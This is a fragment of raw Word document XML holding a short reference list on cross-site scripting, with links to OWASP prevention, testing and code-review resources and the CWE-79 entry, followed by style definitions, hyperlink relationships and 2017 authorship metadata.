      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:anchor="tab=Use_the_Java_Encoder_Project" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP Java Encoder API</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ASVS: Output Encoding/Escaping Requirements (V6)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">OWASP </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>AntiSamy</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>: Sanitization Library</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Testing Guide: 1st 3 Chapters on Data Validation Testing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00D74499" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00DB2481" w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t xml:space="preserve">• </w:t>
        </w:r>
        <w:r w:rsidR="00DB2481" w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP Code Review Guide: Chapter on XSS Review</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DB2481" w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D74499" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP XSS Filter Evasion Cheat Sheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:after="70"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">External </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00D74499">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CWE Entry 79 on Cross-Site Scripting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DB2481">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2481" w:rsidRPr="00DB2481" w:rsidRDefault="00DB2481" w:rsidP="00DB2481"/>
    <w:sectPr w:rsidR="00DB2481" w:rsidRPr="00DB24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53AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EFFE6EF4"/>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04A0D22"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBBCC28E"/>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F7C616C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="648CCA2C"/>
    <w:lvl w:ilvl="0" w:tplc="A904747E">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1C490"/>
    <w:rsid w:val="B9E748F4"/>
    <w:rsid w:val="B9FDC50E"/>
    <w:rsid w:val="DFBF730F"/>
    <w:rsid w:val="0019536C"/>
    <w:rsid w:val="001B088A"/>
    <w:rsid w:val="00581EAD"/>
    <w:rsid w:val="00952F40"/>
    <w:rsid w:val="00B00D7E"/>
    <w:rsid w:val="00C632B9"/>
    <w:rsid w:val="00D74499"/>
    <w:rsid w:val="00DB2481"/>
    <w:rsid w:val="00EA40B9"/>
    <w:rsid w:val="32FF04BD"/>
    <w:rsid w:val="3FFDC127"/>
    <w:rsid w:val="6B7749CC"/>
    <w:rsid w:val="6DBFA4B1"/>
    <w:rsid w:val="7D5E98F2"/>
    <w:rsid w:val="7FF1C490"/>
    <w:rsid w:val="7FFDF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CAB35"/>
  <w15:docId w15:val="{963D9296-02C6-4EEB-B710-E666372B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PT" w:eastAsia="pt-PT"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link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00D74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744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1B088A"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00DB248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rsid w:val="00D74499"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:rsid w:val="00D74499"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>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wasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Input_Validation" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_She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ypes_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Shee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43FF41-531B-424D-A51A-790DFFCA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1156</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kembolle</dc:creator>
  <cp:lastModifiedBy>Tiago Mota Xavier dos Santos Reis (M2015659)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-22T09:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-22T09:41:00Z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